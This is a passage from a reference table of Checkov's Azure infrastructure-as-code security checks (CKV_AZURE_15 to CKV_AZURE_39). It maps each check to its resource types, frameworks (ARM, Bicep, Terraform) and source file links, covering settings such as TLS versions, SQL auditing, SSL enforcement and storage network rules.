Service | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py) | -| 1569 | CKV_AZURE_15 | resource | Microsoft.Web/sites | Ensure web app is using the latest version of TLS encryption | arm | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceMinTLSVersion.py) | -| 1570 | CKV_AZURE_15 | resource | Microsoft.Web/sites | Ensure web app is using the latest version of TLS encryption | Bicep | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceMinTLSVersion.py) | -| 1571 | CKV_AZURE_15 | resource | azurerm_app_service | Ensure web app is using the latest version of TLS encryption | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py) | -| 1572 | CKV_AZURE_15 | resource | azurerm_linux_web_app | Ensure web app is using the latest version of TLS encryption | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py) | -| 1573 | CKV_AZURE_15 | resource | azurerm_windows_web_app | Ensure web app is using the latest version of TLS encryption | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py) | -| 1574 | CKV_AZURE_16 | resource | Microsoft.Web/sites | Ensure that Register with Azure Active Directory is enabled on App Service | arm | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentity.py) | -| 1575 | CKV_AZURE_16 | resource | Microsoft.Web/sites | Ensure that Register with Azure Active Directory is enabled on App Service | Bicep | 
[AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentity.py) | -| 1576 | CKV_AZURE_16 | resource | azurerm_app_service | Ensure that Register with Azure Active Directory is enabled on App Service | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py) | -| 1577 | CKV_AZURE_16 | resource | azurerm_linux_web_app | Ensure that Register with Azure Active Directory is enabled on App Service | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py) | -| 1578 | CKV_AZURE_16 | resource | azurerm_windows_web_app | Ensure that Register with Azure Active Directory is enabled on App Service | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py) | -| 1579 | CKV_AZURE_17 | resource | Microsoft.Web/sites | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | arm | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceClientCertificate.py) | -| 1580 | CKV_AZURE_17 | resource | Microsoft.Web/sites | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Bicep | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceClientCertificate.py) | -| 1581 | CKV_AZURE_17 | resource | azurerm_app_service | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py) | -| 1582 | CKV_AZURE_17 | resource | azurerm_linux_web_app | Ensure the web app has 'Client Certificates (Incoming 
client certificates)' set | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py) | -| 1583 | CKV_AZURE_17 | resource | azurerm_windows_web_app | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py) | -| 1584 | CKV_AZURE_18 | resource | Microsoft.Web/sites | Ensure that 'HTTP Version' is the latest if used to run the web app | arm | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttps20Enabled.py) | -| 1585 | CKV_AZURE_18 | resource | Microsoft.Web/sites | Ensure that 'HTTP Version' is the latest if used to run the web app | Bicep | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttps20Enabled.py) | -| 1586 | CKV_AZURE_18 | resource | azurerm_app_service | Ensure that 'HTTP Version' is the latest if used to run the web app | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py) | -| 1587 | CKV_AZURE_18 | resource | azurerm_linux_web_app | Ensure that 'HTTP Version' is the latest if used to run the web app | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py) | -| 1588 | CKV_AZURE_18 | resource | azurerm_windows_web_app | Ensure that 'HTTP Version' is the latest if used to run the web app | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py) | -| 1589 | CKV_AZURE_19 | resource | 
Microsoft.Security/pricings | Ensure that standard pricing tier is selected | arm | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterStandardPricing.py) | -| 1590 | CKV_AZURE_19 | resource | Microsoft.Security/pricings | Ensure that standard pricing tier is selected | Bicep | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterStandardPricing.py) | -| 1591 | CKV_AZURE_19 | resource | azurerm_security_center_subscription_pricing | Ensure that standard pricing tier is selected | Terraform | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterStandardPricing.py) | -| 1592 | CKV_AZURE_20 | resource | Microsoft.Security/securityContacts | Ensure that security contact 'Phone number' is set | arm | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactPhone.py) | -| 1593 | CKV_AZURE_20 | resource | Microsoft.Security/securityContacts | Ensure that security contact 'Phone number' is set | Bicep | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactPhone.py) | -| 1594 | CKV_AZURE_20 | resource | azurerm_security_center_contact | Ensure that security contact 'Phone number' is set | Terraform | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactPhone.py) | -| 1595 | CKV_AZURE_21 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | arm | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlert.py) | -| 1596 | CKV_AZURE_21 | resource 
| Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Bicep | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlert.py) | -| 1597 | CKV_AZURE_21 | resource | azurerm_security_center_contact | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Terraform | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmailAlert.py) | -| 1598 | CKV_AZURE_22 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | arm | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlertAdmins.py) | -| 1599 | CKV_AZURE_22 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Bicep | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlertAdmins.py) | -| 1600 | CKV_AZURE_22 | resource | azurerm_security_center_contact | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Terraform | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmailAlertAdmins.py) | -| 1601 | CKV_AZURE_23 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' is set to 'Enabled' for SQL servers | arm | [SQLServerAuditingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingEnabled.py) | -| 1602 | CKV_AZURE_23 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | 
[SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | -| 1603 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/auditingSettings | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | -| 1604 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/databases | Ensure that 'Auditing' is set to 'Enabled' for SQL servers | arm | [SQLServerAuditingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingEnabled.py) | -| 1605 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/databases | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | -| 1606 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/databases/auditingSettings | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | -| 1607 | CKV_AZURE_23 | resource | azurerm_mssql_server | Ensure that 'Auditing' is set to 'On' for SQL servers | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml) | -| 1608 | CKV_AZURE_23 | resource | azurerm_mssql_server_extended_auditing_policy | Ensure that 'Auditing' is set to 'On' for SQL servers | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml) | -| 1609 | CKV_AZURE_23 | resource | azurerm_sql_server | Ensure that 'Auditing' is set to 'On' for SQL 
servers | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml) | -| 1610 | CKV_AZURE_24 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | arm | [SQLServerAuditingRetention90Days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingRetention90Days.py) | -| 1611 | CKV_AZURE_24 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Bicep | [SQLServerAuditingRetention90Days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingRetention90Days.py) | -| 1612 | CKV_AZURE_24 | resource | azurerm_mssql_server | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml) | -| 1613 | CKV_AZURE_24 | resource | azurerm_mssql_server_extended_auditing_policy | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml) | -| 1614 | CKV_AZURE_24 | resource | azurerm_sql_server | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml) | -| 1615 | CKV_AZURE_25 | resource | Microsoft.Sql/servers/databases | Ensure that 'Threat Detection types' is set to 'All' | arm | 
[SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerThreatDetectionTypes.py) | -| 1616 | CKV_AZURE_25 | resource | Microsoft.Sql/servers/databases | Ensure that 'Threat Detection types' is set to 'All' | Bicep | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerThreatDetectionTypes.py) | -| 1617 | CKV_AZURE_25 | resource | azurerm_mssql_server_security_alert_policy | Ensure that 'Threat Detection types' is set to 'All' | Terraform | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerThreatDetectionTypes.py) | -| 1618 | CKV_AZURE_26 | resource | Microsoft.Sql/servers/databases | Ensure that 'Send Alerts To' is enabled for MSSQL servers | arm | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsEnabled.py) | -| 1619 | CKV_AZURE_26 | resource | Microsoft.Sql/servers/databases | Ensure that 'Send Alerts To' is enabled for MSSQL servers | Bicep | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsEnabled.py) | -| 1620 | CKV_AZURE_26 | resource | azurerm_mssql_server_security_alert_policy | Ensure that 'Send Alerts To' is enabled for MSSQL servers | Terraform | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerEmailAlertsEnabled.py) | -| 1621 | CKV_AZURE_27 | resource | Microsoft.Sql/servers/databases | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers | arm | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsToAdminsEnabled.py) | -| 1622 | CKV_AZURE_27 | resource | 
Microsoft.Sql/servers/databases | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers | Bicep | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsToAdminsEnabled.py) | -| 1623 | CKV_AZURE_27 | resource | azurerm_mssql_server_security_alert_policy | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers | Terraform | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerEmailAlertsToAdminsEnabled.py) | -| 1624 | CKV_AZURE_28 | resource | Microsoft.DBforMySQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server | arm | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerSSLEnforcementEnabled.py) | -| 1625 | CKV_AZURE_28 | resource | Microsoft.DBforMySQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server | Bicep | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerSSLEnforcementEnabled.py) | -| 1626 | CKV_AZURE_28 | resource | azurerm_mysql_server | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server | Terraform | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLServerSSLEnforcementEnabled.py) | -| 1627 | CKV_AZURE_29 | resource | Microsoft.DBforPostgreSQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server | arm | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerSSLEnforcementEnabled.py) | -| 1628 | CKV_AZURE_29 | resource | Microsoft.DBforPostgreSQL/servers | Ensure 'Enforce SSL 
connection' is set to 'ENABLED' for PostgreSQL Database Server | Bicep | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerSSLEnforcementEnabled.py) | -| 1629 | CKV_AZURE_29 | resource | azurerm_postgresql_server | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server | Terraform | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerSSLEnforcementEnabled.py) | -| 1630 | CKV_AZURE_30 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | -| 1631 | CKV_AZURE_30 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | -| 1632 | CKV_AZURE_30 | resource | azurerm_postgresql_configuration | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogCheckpointsEnabled.py) | -| 1633 | CKV_AZURE_30 | resource | configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | -| 1634 | CKV_AZURE_30 | resource | configurations | Ensure 
server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | -| 1635 | CKV_AZURE_31 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | -| 1636 | CKV_AZURE_31 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | -| 1637 | CKV_AZURE_31 | resource | azurerm_postgresql_configuration | Ensure server parameter 'log_connections' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogConnectionsEnabled.py) | -| 1638 | CKV_AZURE_31 | resource | configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | -| 1639 | CKV_AZURE_31 | resource | configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | -| 1640 | CKV_AZURE_32 | resource | 
Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | -| 1641 | CKV_AZURE_32 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | -| 1642 | CKV_AZURE_32 | resource | azurerm_postgresql_configuration | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerConnectionThrottlingEnabled.py) | -| 1643 | CKV_AZURE_32 | resource | configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | -| 1644 | CKV_AZURE_32 | resource | configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | -| 1645 | CKV_AZURE_33 | resource | Microsoft.Storage/storageAccounts/queueServices/providers/diagnosticsettings | Ensure Storage logging is enabled for Queue service for read, write and delete requests | arm | 
[StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountLoggingQueueServiceEnabled.py) | -| 1646 | CKV_AZURE_33 | resource | Microsoft.Storage/storageAccounts/queueServices/providers/diagnosticsettings | Ensure Storage logging is enabled for Queue service for read, write and delete requests | Bicep | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountLoggingQueueServiceEnabled.py) | -| 1647 | CKV_AZURE_33 | resource | azurerm_storage_account | Ensure Storage logging is enabled for Queue service for read, write and delete requests | Terraform | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountLoggingQueueServiceEnabled.py) | -| 1648 | CKV_AZURE_34 | resource | Microsoft.Storage/storageAccounts/blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | arm | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | -| 1649 | CKV_AZURE_34 | resource | Microsoft.Storage/storageAccounts/blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | -| 1650 | CKV_AZURE_34 | resource | azurerm_storage_container | Ensure that 'Public access level' is set to Private for blob containers | Terraform | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageBlobServiceContainerPrivateAccess.py) | -| 1651 | CKV_AZURE_34 | resource | blobServices/containers | Ensure 
that 'Public access level' is set to Private for blob containers | arm | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | -| 1652 | CKV_AZURE_34 | resource | blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | -| 1653 | CKV_AZURE_34 | resource | containers | Ensure that 'Public access level' is set to Private for blob containers | arm | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | -| 1654 | CKV_AZURE_34 | resource | containers | Ensure that 'Public access level' is set to Private for blob containers | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | -| 1655 | CKV_AZURE_35 | resource | Microsoft.Storage/storageAccounts | Ensure default network access rule for Storage Accounts is set to deny | arm | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDefaultNetworkAccessDeny.py) | -| 1656 | CKV_AZURE_35 | resource | Microsoft.Storage/storageAccounts | Ensure default network access rule for Storage Accounts is set to deny | Bicep | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py) | -| 1657 | CKV_AZURE_35 | resource | azurerm_storage_account | Ensure default network access rule for Storage Accounts is set to deny | Terraform | 
[StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py) | -| 1658 | CKV_AZURE_35 | resource | azurerm_storage_account_network_rules | Ensure default network access rule for Storage Accounts is set to deny | Terraform | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py) | -| 1659 | CKV_AZURE_36 | resource | Microsoft.Storage/storageAccounts | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | arm | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountAzureServicesAccessEnabled.py) | -| 1660 | CKV_AZURE_36 | resource | Microsoft.Storage/storageAccounts | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | Bicep | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py) | -| 1661 | CKV_AZURE_36 | resource | azurerm_storage_account | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | Terraform | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py) | -| 1662 | CKV_AZURE_36 | resource | azurerm_storage_account_network_rules | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | Terraform | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py) | -| 1663 | CKV_AZURE_37 | resource | Microsoft.Insights/logprofiles | Ensure that Activity Log Retention is set 365 days or greater | arm | 
[MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileRetentionDays.py) | -| 1664 | CKV_AZURE_37 | resource | Microsoft.Insights/logprofiles | Ensure that Activity Log Retention is set 365 days or greater | Bicep | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileRetentionDays.py) | -| 1665 | CKV_AZURE_37 | resource | azurerm_monitor_log_profile | Ensure that Activity Log Retention is set 365 days or greater | Terraform | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MonitorLogProfileRetentionDays.py) | -| 1666 | CKV_AZURE_38 | resource | Microsoft.Insights/logprofiles | Ensure audit profile captures all the activities | arm | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileCategories.py) | -| 1667 | CKV_AZURE_38 | resource | Microsoft.Insights/logprofiles | Ensure audit profile captures all the activities | Bicep | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileCategories.py) | -| 1668 | CKV_AZURE_38 | resource | azurerm_monitor_log_profile | Ensure audit profile captures all the activities | Terraform | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MonitorLogProfileCategories.py) | -| 1669 | CKV_AZURE_39 | resource | Microsoft.Authorization/roleDefinitions | Ensure that no custom subscription owner roles are created | arm | [CustomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py) | -| 